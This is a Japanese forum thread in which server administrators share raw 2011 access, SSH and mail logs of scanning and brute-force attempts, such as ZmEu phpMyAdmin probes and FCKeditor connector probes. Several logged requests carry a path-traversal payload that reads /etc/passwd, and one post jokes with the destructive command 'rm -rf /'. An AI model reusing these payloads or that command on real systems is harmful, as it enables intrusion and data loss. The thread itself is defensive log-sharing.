/~/PMA/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:55:08 +0900] "GET /~/admin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:55:14 +0900] "GET /~/myadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:55:20 +0900] "GET /~/phpadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:55:26 +0900] "GET /~/phpmanager/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:55:32 +0900] "GET /~/phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 89.149.242.190 [22/Feb/2011:02:55:38 +0900] "GET :2086/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 400 REF:- 89.149.242.190 [22/Feb/2011:02:55:44 +0900] "GET :2087/3rdparty/phpMyAdmin/scripts/setup.php HTTP/1.1" 400 REF:- 89.149.242.190 [22/Feb/2011:02:55:50 +0900] "GET :81/phpmyadmin/scripts/setup.php HTTP/1.1" 400 REF:- アタックなんて映画の中だけの話だと思ってました phpmyadminが大好きなんだろうな i125-202-167-50.s10.a029.ap.plala.or.jp 89.106.13.209 - - [24/Feb/2011:03:08:57 +0900] "GET //phpmyadmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:08:57 +0900] "GET //phpMyAdmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:08:58 +0900] "GET //admin/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:08:59 +0900] "GET //dbadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:08:59 +0900] "GET //myadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:00 +0900] "GET //mysql/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:01 +0900] "GET //mysqladmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:01 +0900] "GET //phpadmin/ HTTP/1.1" 403 211 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:02 +0900] "GET //pma/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:03 +0900] "GET //phpdb/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:03 +0900] "GET //db/ HTTP/1.1" 403 205 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:04 +0900] "GET //mysqladmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:05 +0900] "GET //SQL/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:05 +0900] "GET //padmin/ HTTP/1.1" 403 209 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:06 +0900] "GET //pmadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 89.106.13.209 - - [24/Feb/2011:03:09:07 +0900] "GET //webdb/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 既出かな? 既出っていうか、もう手当たり次第って感じだな でも、うちには何週間か来てない ::1 - - [25/Feb/2011:04:07:33 +0900] "OPTIONS * HTTP/1.0" 200 - "-" "Apache (internal dummy connection)" 手前は節穴か 77.222.43.19 - - [25/Feb/2011:22:57:37 +0900] "GET //phpmyadmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 77.222.43.19 - - [25/Feb/2011:22:57:38 +0900] "GET //phpMyAdmin/ HTTP/1.1" 403 213 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 77.222.43.19 - - [25/Feb/2011:22:57:38 +0900] "GET //MyAdmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 77.222.43.19 - - [25/Feb/2011:22:57:41 +0900] "GET //myadmin/ HTTP/1.1" 403 210 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 77.222.43.19 - - [25/Feb/2011:22:57:44 +0900] "GET //pma/ HTTP/1.1" 403 206 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" 77.222.43.19 - - [25/Feb/2011:22:57:45 +0900] "GET //mysql/ HTTP/1.1" 403 208 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro" mod_geoipで弾いてるから実害無いが また来てやがる //っていうのがうざいよね。 馬鹿なのって思うわ。 195.7.10.56 [26/Feb/2011:13:38:52 +0900] GET //phpMyAdmin/scripts/setup.php HTTP/1.1 404 226 195.7.10.56 [26/Feb/2011:13:38:52 +0900] GET //phpMyAdmin1/scripts/setup.php HTTP/1.1 404 227 195.7.10.56 [26/Feb/2011:13:38:53 +0900] GET //phpMyAdmin-2/scripts/setup.php HTTP/1.1 404 228 195.7.10.56 [26/Feb/2011:13:38:54 +0900] GET //phpadmin/scripts/setup.php HTTP/1.1 404 224 195.7.10.56 [26/Feb/2011:13:38:55 +0900] GET //phpmyadmin/scripts/setup.php HTTP/1.1 404 226 195.7.10.56 [26/Feb/2011:13:38:55 +0900] GET //phpmyadmin.old/scripts/setup.php HTTP/1.1 404 230 195.7.10.56 [26/Feb/2011:13:38:56 +0900] GET //old.phpmyadmin/scripts/setup.php HTTP/1.1 404 230 195.7.10.56 [26/Feb/2011:13:38:57 +0900] GET //phpmyadmin1/scripts/setup.php HTTP/1.1 404 227 195.7.10.56 [26/Feb/2011:13:38:58 +0900] GET //phpmyadmin-2/scripts/setup.php HTTP/1.1 404 228 195.7.10.56 [26/Feb/2011:13:38:58 +0900] GET //phpmyadmin1/scripts/setup.php HTTP/1.1 404 227 195.7.10.56 [26/Feb/2011:13:38:59 +0900] GET //phpmyadmin2/scripts/setup.php HTTP/1.1 404 227 195.7.10.56 [26/Feb/2011:13:39:00 +0900] GET //pma/scripts/setup.php HTTP/1.1 404 219 とか 46.4.50.141 [27/Feb/2011:03:17:47 +0900] GET //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 219 46.4.50.141 [27/Feb/2011:03:17:47 +0900] GET //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 224 46.4.50.141 [27/Feb/2011:03:17:48 +0900] GET //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 218 46.4.50.141 [27/Feb/2011:03:17:49 +0900] GET //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 221 46.4.50.141 [27/Feb/2011:03:17:49 +0900] GET //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 221 46.4.50.141 [27/Feb/2011:03:17:50 +0900] GET //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 213 46.4.50.141 [27/Feb/2011:03:17:50 +0900] GET //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 226 46.4.50.141 [27/Feb/2011:03:17:51 +0900] GET //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 222 46.4.50.141 [27/Feb/2011:03:17:51 +0900] GET //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 212 のが 1日1回くらい記録されているかなぁ。 SSHDにもやってくる。 reverse mapping checking getaddrinfo for 122.3.134.131.pldt.net [122.3.134.131] failed - POSSIBLE BREAK-IN ATTEMPT! : 202 time(s) reverse mapping checking getaddrinfo for 178-162-164-39.local [178.162.164.39] failed - POSSIBLE BREAK-IN ATTEMPT! : 55 time(s) Address 64.235.57.228 maps to lasvegas-nv-datacenter.com, but this does not map back to the address - POSSIBLE BREAK-IN ATTEMPT! : 1 time(s) # ping localhost # rm -rf / メールサーバへの攻撃 113.244.196.159 1日1万通以上はじいてるのに懲りないww 193.252.15.94 lputeaux-151-43-28-94.w193-252.abo.wanadoo.fr 89.2.94.115 ip-115.net-89-2-94.rev.numericable.fr 162.78.3.110.ap.yournet.ne.jpなんやて 74.3.202.84 - - [20/Mar/2011:08:01:18 +0900] "HEAD /phpmyadmintting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //phpMyAdmin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //admin/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //mysql/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 74.3.202.84 - - [20/Mar/2011:08:01:19 +0900] "HEAD //phpmyadmin2/tting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" 74.3.202.84 - - [20/Mar/2011:08:01:20 +0900] "HEAD /epgrec/envSetting.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 7.0; en; rv:1.9.1.3) Gecko/20090309 Firefox/3.5.3" PMANと結婚しろ 昨夜21時過ぎからSMTP鯖へ2~3秒毎に延々アタック > "2011-04-04 21:15:49","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:15:51","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:15:53","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:15:55","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:15:57","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:00","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:02","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:04","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:06","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:08","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:10","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:12","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:14","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:16","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" > "2011-04-04 21:16:18","189.52.17.130","xgjnswuku.com","","","","","AUTH=EFAIL:TYPE=CRAM-MD5","","0","" 以下略 なんか見慣れないものがあった > 2011/04/10,07:49:13,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/","","1.1",200,8097 > 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:17,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:18,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:19,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:20,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/include/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:21,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/FCKeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:22,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/manager/fckeditor/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/browser/default/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/connectors/php/connector.php","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/browser/default/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 > 2011/04/10,07:49:23,216.108.235.94,"host1.capitalunlimitedgroup.com","-","-",GET,"/fck/editor/filemanager/connectors/asp/connector.asp","Command=GetFolders&Type=File&CurrentFolder=/","1.1",404,3077 49.212.19.24 www1230ub.sakura.ne.jp 49.212.21.126 www1102ud.sakura.ne.jp 41.89.28.4 - - [30/Apr/2011:14:35:13 +0900] "GET /webdav/test HTTP/1.1" 404 289 "-" "-" 217.243.187.36 - - [30/Apr/2011:23:45:49 +0900] "GET /webdav/test HTTP/1.1" 404 289 "-" "-" 81.201.60.163 - - [02/May/2011:05:29:09 +0900] "GET /sd/1M HTTP/1.1" 404 280 "-" "-" 195.246.217.24 - - [03/May/2011:07:51:26 +0900] "GET /user/soapCaller.bs HTTP/1.1" 404 296 "-" "Morfeus Fucking Scanner" 123.30.109.21 - - [04/May/2011:17:00:57 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:00:57 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:00:58 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:01:06 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:01:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:01:07 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 319 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 303 "-" "ZmEu" 123.30.109.21 - - [04/May/2011:17:02:07 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 403 310 "-" "ZmEu" 46.28.109.24 [2011.4/03-12:12:23 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:23 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:29 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:24 +0900] "GET //admin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:35 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:41 +0900] "GET //mysql/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:47 +0900] "GET //mysqladmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:53 +0900] "GET //phpadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:12:59 +0900] "GET //pma/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:05 +0900] "GET //phpdb/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:11 +0900] "GET //db/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:17 +0900] "GET //mysqladmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:23 +0900] "GET //SQL/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:29 +0900] "GET //padmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:35 +0900] "GET //pmadmin/ HTTP/1.1" 404 REF:- 46.28.109.24 [2011.4/03-12:13:41 +0900] "GET //webdb/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:45:58 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:45:59 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:00 +0900] "GET //pma/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:05 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:11 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:17 +0900] "GET //phppgadmin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:23 +0900] "GET //PMA/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:29 +0900] "GET //admin/ HTTP/1.1" 404 REF:- 113.140.75.222 [2011.4/03-19:46:35 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:55:54 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:55:54 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:55:55 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:56:01 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:56:07 +0900] "GET //pma/ HTTP/1.1" 404 REF:- 212.58.96.55 [2011.4/13-01:56:13 +0900] "GET //mysql/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:03 +0900] "GET //phpmyadmin/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:04 +0900] "GET //phpMyAdmin/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:05 +0900] "GET //pma/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:10 +0900] "GET //dbadmin/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:16 +0900] "GET //myadmin/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:22 +0900] "GET //phppgadmin/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:28 +0900] "GET //PMA/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:34 +0900] "GET //admin/ HTTP/1.1" 404 REF:- 58.83.227.150 [2011.4/13-22:18:41 +0900] "GET //MyAdmin/ HTTP/1.1" 404 REF:- 123.30.109.21 [2011.4/20-13:22:53 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 123.30.109.21 [2011.4/20-13:22:52 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 123.30.109.21 [2011.4/30-00:16:47 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:- 123.30.109.21 [2011.4/30-00:16:48 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 123.30.109.21 [2011.4/30-00:16:48 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 113.57.252.72 [2011.5/04-11:08:05 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 113.57.252.72 [2011.5/04-11:08:05 +0900] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 403 REF:- 113.57.252.72 [2011.5/04-11:08:06 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- 113.57.252.72 [2011.5/04-11:08:07 +0900] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 REF:- 113.57.252.72 [2011.5/04-11:08:12 +0900] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 REF:- googlebotから謎のアクセス なんだこれ。。。 66.249.69.28 - - [05/May/2011:20:52:21 +0900] "GET /upload/viewer_board/wdviewer.exe HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html )" 66.249.69.28 - - [05/May/2011:20:52:24 +0900] "GET /upload/viewer_board/HwpViewer2007.exe HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html )" 66.249.67.73 - - [05/May/2011:20:52:24 +0900] "GET /upload/viewer_board/AdbeRdr70_kor_full.exe HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html )" 66.249.69.28 - - [05/May/2011:20:52:25 +0900] "GET /upload/viewer_board/Hunv2k.exe HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html )" 1年前に削除したKENTWEBのcgiに向かって、今でも毎日数十アクセスある。 apacheのアクセスログもエラーログも、404やら、File does not existのエラーメッセージでいっぱいwww 